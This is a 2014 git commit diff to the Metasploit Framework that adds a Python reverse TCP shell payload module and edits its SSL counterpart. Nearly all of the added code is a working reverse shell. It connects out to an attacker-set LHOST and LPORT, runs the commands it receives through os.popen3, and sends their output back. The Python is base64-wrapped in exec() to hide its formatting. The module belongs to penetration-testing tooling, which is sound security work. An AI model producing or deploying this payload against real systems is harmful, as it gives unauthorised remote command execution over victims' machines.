Compat

2014-06-04 02:27:06 +01:00 · 2014-06-04 02:27:06 +01:00 · c032b8ce8e
parent bf52c0b888
commit c032b8ce8e
2 changed files with 73 additions and 7 deletions
--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@ -0,0 +1,68 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Command Shell, Reverse TCP (via python)',
+      'Description'   => 'Creates an interactive shell via python, encodes with base64 by design. Compat with 2.3.3',
+      'Author'        => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
+      'License'       => BSD_LICENSE,
+      'Platform'      => 'python',
+      'Arch'          => ARCH_PYTHON,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'python',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    cmd = ''
+    dead = Rex::Text.rand_text_alpha(2)
+    # Set up the socket
+    cmd << "import socket,os\n"
+    cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
+    cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
+    # The actual IO
+    cmd << "#{dead}=False\n"
+    cmd << "while not #{dead}:\n"
+    cmd << "\tdata=so.recv(1024)\n"
+    cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
+    cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
+    cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
+    cmd << "\tso.send(stdout_value)\n"
+
+    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
+
+    cmd
+  end
+
+end
+
--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@ -15,12 +15,12 @@ module Metasploit3

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP SSL (via python)',
+      'Name'          => 'Command Shell, Reverse TCP SSL (via python)',
      'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
      'Author'        => 'RageLtMan',
      'License'       => BSD_LICENSE,
      'Platform'      => 'python',
-      'Arch'          => ARCH_CMD,
+      'Arch'          => ARCH_PYTHON,
      'Handler'       => Msf::Handler::ReverseTcpSsl,
      'Session'       => Msf::Sessions::CommandShell,
      'PayloadType'   => 'python',
@ -36,8 +36,7 @@ module Metasploit3
  # Constructs the payload
  #
  def generate
-    vprint_good(command_string)
-    return super + command_string
+    super + command_string
  end

  #
@ -60,11 +59,10 @@ module Metasploit3
    cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
    cmd += "\ts.send(stdout_value)\n"

-    # The *nix shell wrapper to keep things clean
    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-    return cmd

+    cmd
  end
-
 end
+